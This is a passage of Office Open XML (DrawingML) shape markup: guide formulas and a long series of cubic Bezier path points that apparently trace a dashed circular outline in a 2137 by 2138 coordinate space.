                <a:gd name="T77" fmla="*/ 1749 h 2138"/>
                <a:gd name="T78" fmla="*/ 302 w 2137"/>
                <a:gd name="T79" fmla="*/ 1814 h 2138"/>
                <a:gd name="T80" fmla="*/ 375 w 2137"/>
                <a:gd name="T81" fmla="*/ 1877 h 2138"/>
                <a:gd name="T82" fmla="*/ 493 w 2137"/>
                <a:gd name="T83" fmla="*/ 1960 h 2138"/>
                <a:gd name="T84" fmla="*/ 563 w 2137"/>
                <a:gd name="T85" fmla="*/ 2006 h 2138"/>
                <a:gd name="T86" fmla="*/ 646 w 2137"/>
                <a:gd name="T87" fmla="*/ 2047 h 2138"/>
                <a:gd name="T88" fmla="*/ 745 w 2137"/>
                <a:gd name="T89" fmla="*/ 2080 h 2138"/>
                <a:gd name="T90" fmla="*/ 859 w 2137"/>
                <a:gd name="T91" fmla="*/ 2117 h 2138"/>
                <a:gd name="T92" fmla="*/ 955 w 2137"/>
                <a:gd name="T93" fmla="*/ 2128 h 2138"/>
                <a:gd name="T94" fmla="*/ 1059 w 2137"/>
                <a:gd name="T95" fmla="*/ 2130 h 2138"/>
                <a:gd name="T96" fmla="*/ 1159 w 2137"/>
                <a:gd name="T97" fmla="*/ 2134 h 2138"/>
                <a:gd name="T98" fmla="*/ 1258 w 2137"/>
                <a:gd name="T99" fmla="*/ 2113 h 2138"/>
                <a:gd name="T100" fmla="*/ 1376 w 2137"/>
                <a:gd name="T101" fmla="*/ 2093 h 2138"/>
                <a:gd name="T102" fmla="*/ 1468 w 2137"/>
                <a:gd name="T103" fmla="*/ 2052 h 2138"/>
                <a:gd name="T104" fmla="*/ 1562 w 2137"/>
                <a:gd name="T105" fmla="*/ 2018 h 2138"/>
                <a:gd name="T106" fmla="*/ 1644 w 2137"/>
                <a:gd name="T107" fmla="*/ 1960 h 2138"/>
                <a:gd name="T108" fmla="*/ 1725 w 2137"/>
                <a:gd name="T109" fmla="*/ 1902 h 2138"/>
                <a:gd name="T110" fmla="*/ 1806 w 2137"/>
                <a:gd name="T111" fmla="*/ 1843 h 2138"/>
                <a:gd name="T112" fmla="*/ 1869 w 2137"/>
                <a:gd name="T113" fmla="*/ 1765 h 2138"/>
                <a:gd name="T114" fmla="*/ 1938 w 2137"/>
                <a:gd name="T115" fmla="*/ 1691 h 2138"/>
                <a:gd name="T116" fmla="*/ 2005 w 2137"/>
                <a:gd name="T117" fmla="*/ 1568 h 2138"/>
                <a:gd name="T118" fmla="*/ 2045 w 2137"/>
                <a:gd name="T119" fmla="*/ 1494 h 2138"/>
                <a:gd name="T120" fmla="*/ 2083 w 2137"/>
                <a:gd name="T121" fmla="*/ 1405 h 2138"/>
                <a:gd name="T122" fmla="*/ 2107 w 2137"/>
                <a:gd name="T123" fmla="*/ 1287 h 2138"/>
                <a:gd name="T124" fmla="*/ 2131 w 2137"/>
                <a:gd name="T125" fmla="*/ 1190 h 2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37" h="2138">
                  <a:moveTo>
                    <a:pt x="2129" y="1068"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1068"/>
                    <a:pt x="2129" y="1069"/>
                    <a:pt x="2129" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1076"/>
                    <a:pt x="2129" y="1083"/>
                    <a:pt x="2129" y="1089"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1091"/>
                    <a:pt x="2131" y="1093"/>
                    <a:pt x="2133" y="1093"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2135" y="1093"/>
                    <a:pt x="2137" y="1092"/>
                    <a:pt x="2137" y="1089"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137" y="1083"/>
                    <a:pt x="2137" y="1076"/>
                    <a:pt x="2137" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137" y="1069"/>
                    <a:pt x="2137" y="1068"/>
                    <a:pt x="2137" y="1068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137" y="1065"/>
                    <a:pt x="2136" y="1064"/>
                    <a:pt x="2133" y="1064"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="1064"/>
                    <a:pt x="2129" y="1065"/>
                    <a:pt x="2129" y="1068"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2129" y="1028"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1034"/>
                    <a:pt x="2129" y="1041"/>
                    <a:pt x="2129" y="1048"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2129" y="1050"/>
                    <a:pt x="2131" y="1052"/>
                    <a:pt x="2133" y="1052"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2135" y="1051"/>
                    <a:pt x="2137" y="1050"/>
                    <a:pt x="2137" y="1047"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2137" y="1041"/>
                    <a:pt x="2137" y="1034"/>
                    <a:pt x="2137" y="1027"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2136" y="1025"/>
                    <a:pt x="2135" y="1023"/>
                    <a:pt x="2132" y="1024"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="1024"/>
                    <a:pt x="2128" y="1025"/>
                    <a:pt x="2129" y="1028"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2126" y="988"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2127" y="994"/>
                    <a:pt x="2127" y="1001"/>
                    <a:pt x="2128" y="1008"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="1010"/>
                    <a:pt x="2130" y="1012"/>
                    <a:pt x="2132" y="1012"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2134" y="1011"/>
                    <a:pt x="2136" y="1010"/>
                    <a:pt x="2136" y="1007"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2135" y="1001"/>
                    <a:pt x="2135" y="994"/>
                    <a:pt x="2134" y="987"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2134" y="985"/>
                    <a:pt x="2132" y="983"/>
                    <a:pt x="2130" y="984"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2128" y="984"/>
                    <a:pt x="2126" y="986"/>
                    <a:pt x="2126" y="988"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2123" y="948"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2123" y="955"/>
                    <a:pt x="2124" y="961"/>
                    <a:pt x="2125" y="968"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="970"/>
                    <a:pt x="2127" y="972"/>
                    <a:pt x="2129" y="972"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2131" y="971"/>
                    <a:pt x="2133" y="969"/>
                    <a:pt x="2133" y="967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2132" y="961"/>
                    <a:pt x="2131" y="954"/>
                    <a:pt x="2130" y="947"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2130" y="945"/>
                    <a:pt x="2128" y="943"/>
                    <a:pt x="2126" y="944"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2124" y="944"/>
                    <a:pt x="2122" y="946"/>
                    <a:pt x="2123" y="948"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2117" y="909"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2118" y="915"/>
                    <a:pt x="2119" y="922"/>
                    <a:pt x="2120" y="928"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2120" y="931"/>
                    <a:pt x="2122" y="932"/>
                    <a:pt x="2125" y="932"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2127" y="931"/>
                    <a:pt x="2128" y="929"/>
                    <a:pt x="2128" y="927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2127" y="921"/>
                    <a:pt x="2126" y="914"/>
                    <a:pt x="2125" y="907"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2125" y="905"/>
                    <a:pt x="2123" y="904"/>
                    <a:pt x="2121" y="904"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2118" y="904"/>
                    <a:pt x="2117" y="906"/>
                    <a:pt x="2117" y="909"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2111" y="869"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2112" y="876"/>
                    <a:pt x="2113" y="882"/>
                    <a:pt x="2114" y="889"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2114" y="891"/>
                    <a:pt x="2117" y="893"/>
                    <a:pt x="2119" y="892"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2121" y="892"/>
                    <a:pt x="2122" y="890"/>
                    <a:pt x="2122" y="888"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2121" y="881"/>
                    <a:pt x="2120" y="874"/>
                    <a:pt x="2118" y="868"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2118" y="866"/>
                    <a:pt x="2116" y="864"/>
                    <a:pt x="2114" y="865"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2112" y="865"/>
                    <a:pt x="2110" y="867"/>
                    <a:pt x="2111" y="869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2111" y="869"/>
                    <a:pt x="2111" y="869"/>
                    <a:pt x="2111" y="869"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2102" y="830"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2104" y="837"/>
                    <a:pt x="2105" y="843"/>
                    <a:pt x="2107" y="850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2107" y="852"/>
                    <a:pt x="2109" y="853"/>
                    <a:pt x="2111" y="853"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2114" y="852"/>
                    <a:pt x="2115" y="850"/>
                    <a:pt x="2114" y="848"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2113" y="841"/>
                    <a:pt x="2112" y="835"/>
                    <a:pt x="2110" y="828"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2110" y="826"/>
                    <a:pt x="2107" y="825"/>
                    <a:pt x="2105" y="825"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2103" y="826"/>
                    <a:pt x="2102" y="828"/>
                    <a:pt x="2102" y="830"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2093" y="792"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2094" y="798"/>
                    <a:pt x="2096" y="804"/>
                    <a:pt x="2098" y="811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2098" y="813"/>
                    <a:pt x="2100" y="814"/>
                    <a:pt x="2103" y="814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2105" y="813"/>
                    <a:pt x="2106" y="811"/>
                    <a:pt x="2105" y="809"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2104" y="802"/>
                    <a:pt x="2102" y="796"/>
                    <a:pt x="2100" y="789"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2100" y="787"/>
                    <a:pt x="2098" y="786"/>
                    <a:pt x="2095" y="787"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2093" y="787"/>
                    <a:pt x="2092" y="789"/>
                    <a:pt x="2093" y="792"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2082" y="753"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2083" y="760"/>
                    <a:pt x="2085" y="766"/>
                    <a:pt x="2087" y="772"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2088" y="774"/>
                    <a:pt x="2090" y="776"/>
                    <a:pt x="2092" y="775"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2094" y="774"/>
                    <a:pt x="2096" y="772"/>
                    <a:pt x="2095" y="770"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2093" y="764"/>
                    <a:pt x="2091" y="757"/>
                    <a:pt x="2089" y="751"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2088" y="749"/>
                    <a:pt x="2086" y="748"/>
                    <a:pt x="2084" y="748"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2082" y="749"/>
                    <a:pt x="2081" y="751"/>
                    <a:pt x="2082" y="753"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2069" y="715"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2071" y="722"/>
                    <a:pt x="2073" y="728"/>
                    <a:pt x="2075" y="734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2076" y="736"/>
                    <a:pt x="2078" y="737"/>
                    <a:pt x="2080" y="737"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2083" y="736"/>
                    <a:pt x="2084" y="734"/>
                    <a:pt x="2083" y="732"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2081" y="725"/>
                    <a:pt x="2079" y="719"/>
                    <a:pt x="2076" y="713"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2076" y="711"/>
                    <a:pt x="2073" y="709"/>
                    <a:pt x="2071" y="710"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2069" y="711"/>
                    <a:pt x="2068" y="713"/>
                    <a:pt x="2069" y="715"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2055" y="678"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2057" y="684"/>
                    <a:pt x="2060" y="690"/>
                    <a:pt x="2062" y="697"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2063" y="699"/>
                    <a:pt x="2065" y="700"/>
                    <a:pt x="2067" y="699"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2069" y="698"/>
                    <a:pt x="2070" y="696"/>
                    <a:pt x="2070" y="694"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2067" y="687"/>
                    <a:pt x="2065" y="681"/>
                    <a:pt x="2062" y="675"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2062" y="673"/>
                    <a:pt x="2059" y="672"/>
                    <a:pt x="2057" y="673"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2055" y="674"/>
                    <a:pt x="2054" y="676"/>
                    <a:pt x="2055" y="678"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2055" y="678"/>
                    <a:pt x="2055" y="678"/>
                    <a:pt x="2055" y="678"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2040" y="641"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2042" y="647"/>
                    <a:pt x="2045" y="653"/>
                    <a:pt x="2047" y="660"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2048" y="662"/>
                    <a:pt x="2051" y="663"/>
                    <a:pt x="2053" y="662"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2055" y="661"/>
                    <a:pt x="2056" y="659"/>
                    <a:pt x="2055" y="656"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2052" y="650"/>
                    <a:pt x="2050" y="644"/>
                    <a:pt x="2047" y="638"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2046" y="636"/>
                    <a:pt x="2044" y="635"/>
                    <a:pt x="2042" y="636"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2040" y="637"/>
                    <a:pt x="2039" y="639"/>
                    <a:pt x="2040" y="641"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2040" y="641"/>
                    <a:pt x="2040" y="641"/>
                    <a:pt x="2040" y="641"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2023" y="605"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2026" y="611"/>
                    <a:pt x="2029" y="617"/>
                    <a:pt x="2031" y="623"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2032" y="625"/>
                    <a:pt x="2035" y="626"/>
                    <a:pt x="2037" y="625"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2039" y="624"/>
                    <a:pt x="2040" y="622"/>
                    <a:pt x="2039" y="620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2036" y="614"/>
                    <a:pt x="2033" y="608"/>
                    <a:pt x="2030" y="602"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2029" y="600"/>
                    <a:pt x="2027" y="599"/>
                    <a:pt x="2025" y="600"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2023" y="601"/>
                    <a:pt x="2022" y="603"/>
                    <a:pt x="2023" y="605"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2005" y="570"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2008" y="576"/>
                    <a:pt x="2011" y="582"/>
                    <a:pt x="2014" y="587"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2015" y="589"/>
                    <a:pt x="2017" y="590"/>
                    <a:pt x="2019" y="589"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2021" y="588"/>
                    <a:pt x="2022" y="586"/>
                    <a:pt x="2021" y="584"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2018" y="578"/>
                    <a:pt x="2015" y="572"/>
                    <a:pt x="2012" y="566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2011" y="564"/>
                    <a:pt x="2008" y="563"/>
                    <a:pt x="2006" y="564"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2004" y="565"/>
                    <a:pt x="2004" y="568"/>
                    <a:pt x="2005" y="570"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2005" y="570"/>
                    <a:pt x="2005" y="570"/>
                    <a:pt x="2005" y="570"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1985" y="535"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1989" y="541"/>
                    <a:pt x="1992" y="547"/>
                    <a:pt x="1995" y="552"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1996" y="554"/>
                    <a:pt x="1999" y="555"/>
                    <a:pt x="2001" y="554"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2003" y="553"/>
                    <a:pt x="2003" y="550"/>
                    <a:pt x="2002" y="548"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1999" y="543"/>
                    <a:pt x="1996" y="537"/>
                    <a:pt x="1992" y="531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1991" y="529"/>
                    <a:pt x="1989" y="528"/>
                    <a:pt x="1987" y="530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1985" y="531"/>
                    <a:pt x="1984" y="533"/>
                    <a:pt x="1985" y="535"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1965" y="501"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1968" y="507"/>
                    <a:pt x="1972" y="512"/>
                    <a:pt x="1975" y="518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1976" y="520"/>
                    <a:pt x="1979" y="520"/>
                    <a:pt x="1981" y="519"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1982" y="518"/>
                    <a:pt x="1983" y="516"/>
                    <a:pt x="1982" y="514"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1978" y="508"/>
                    <a:pt x="1975" y="502"/>
                    <a:pt x="1971" y="497"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1970" y="495"/>
                    <a:pt x="1968" y="494"/>
                    <a:pt x="1966" y="496"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1964" y="497"/>
                    <a:pt x="1963" y="499"/>
                    <a:pt x="1965" y="501"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1943" y="468"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1946" y="473"/>
                    <a:pt x="1950" y="479"/>
                    <a:pt x="1954" y="484"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1955" y="486"/>
                    <a:pt x="1957" y="487"/>
                    <a:pt x="1959" y="485"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1961" y="484"/>
                    <a:pt x="1962" y="482"/>
                    <a:pt x="1960" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1957" y="474"/>
                    <a:pt x="1953" y="469"/>
                    <a:pt x="1949" y="463"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1948" y="461"/>
                    <a:pt x="1945" y="461"/>
                    <a:pt x="1944" y="462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1942" y="464"/>
                    <a:pt x="1941" y="466"/>
                    <a:pt x="1943" y="468"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1919" y="435"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1923" y="441"/>
                    <a:pt x="1927" y="446"/>
                    <a:pt x="1931" y="452"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1932" y="453"/>
                    <a:pt x="1935" y="454"/>
                    <a:pt x="1937" y="452"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1938" y="451"/>
                    <a:pt x="1939" y="449"/>
                    <a:pt x="1938" y="447"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1934" y="441"/>
                    <a:pt x="1930" y="436"/>
                    <a:pt x="1926" y="431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1924" y="429"/>
                    <a:pt x="1922" y="429"/>
                    <a:pt x="1920" y="430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1918" y="431"/>
                    <a:pt x="1918" y="434"/>
                    <a:pt x="1919" y="435"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1895" y="404"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1899" y="409"/>
                    <a:pt x="1903" y="414"/>
                    <a:pt x="1907" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1909" y="421"/>
                    <a:pt x="1911" y="422"/>
                    <a:pt x="1913" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1915" y="419"/>
                    <a:pt x="1915" y="416"/>
                    <a:pt x="1914" y="415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1909" y="409"/>
                    <a:pt x="1905" y="404"/>
                    <a:pt x="1901" y="399"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1900" y="397"/>
                    <a:pt x="1897" y="397"/>
                    <a:pt x="1896" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1894" y="400"/>
                    <a:pt x="1894" y="402"/>
                    <a:pt x="1895" y="404"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1869" y="373"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1874" y="378"/>
                    <a:pt x="1878" y="383"/>
                    <a:pt x="1882" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1884" y="390"/>
                    <a:pt x="1886" y="391"/>
                    <a:pt x="1888" y="389"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1890" y="388"/>
                    <a:pt x="1890" y="385"/>
                    <a:pt x="1888" y="383"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1884" y="378"/>
                    <a:pt x="1880" y="373"/>
                    <a:pt x="1875" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1874" y="367"/>
                    <a:pt x="1871" y="366"/>
                    <a:pt x="1870" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1868" y="369"/>
                    <a:pt x="1868" y="372"/>
                    <a:pt x="1869" y="373"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1843" y="344"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1847" y="349"/>
                    <a:pt x="1852" y="354"/>
                    <a:pt x="1856" y="358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1858" y="360"/>
                    <a:pt x="1860" y="360"/>
                    <a:pt x="1862" y="359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1863" y="357"/>
                    <a:pt x="1864" y="355"/>
                    <a:pt x="1862" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1858" y="348"/>
                    <a:pt x="1853" y="343"/>
                    <a:pt x="1848" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1847" y="337"/>
                    <a:pt x="1844" y="337"/>
                    <a:pt x="1843" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1841" y="340"/>
                    <a:pt x="1841" y="342"/>
                    <a:pt x="1843" y="344"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1815" y="315"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1819" y="320"/>
                    <a:pt x="1824" y="325"/>
                    <a:pt x="1829" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1830" y="331"/>
                    <a:pt x="1833" y="331"/>
                    <a:pt x="1834" y="329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1836" y="328"/>
                    <a:pt x="1836" y="325"/>
                    <a:pt x="1835" y="324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1830" y="319"/>
                    <a:pt x="1825" y="314"/>
                    <a:pt x="1820" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1819" y="308"/>
                    <a:pt x="1816" y="308"/>
                    <a:pt x="1815" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1813" y="311"/>
                    <a:pt x="1813" y="314"/>
                    <a:pt x="1815" y="315"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1786" y="288"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1791" y="292"/>
                    <a:pt x="1796" y="297"/>
                    <a:pt x="1800" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1802" y="303"/>
                    <a:pt x="1805" y="303"/>
                    <a:pt x="1806" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1808" y="300"/>
                    <a:pt x="1808" y="297"/>
                    <a:pt x="1806" y="296"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1801" y="291"/>
                    <a:pt x="1796" y="286"/>
                    <a:pt x="1791" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1790" y="280"/>
                    <a:pt x="1787" y="280"/>
                    <a:pt x="1786" y="282"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1784" y="284"/>
                    <a:pt x="1784" y="286"/>
                    <a:pt x="1786" y="288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1786" y="288"/>
                    <a:pt x="1786" y="288"/>
                    <a:pt x="1786" y="288"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1756" y="261"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1761" y="266"/>
                    <a:pt x="1766" y="270"/>
                    <a:pt x="1771" y="274"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1773" y="276"/>
                    <a:pt x="1775" y="276"/>
                    <a:pt x="1777" y="274"/>
                  </a:cubicBezTo>
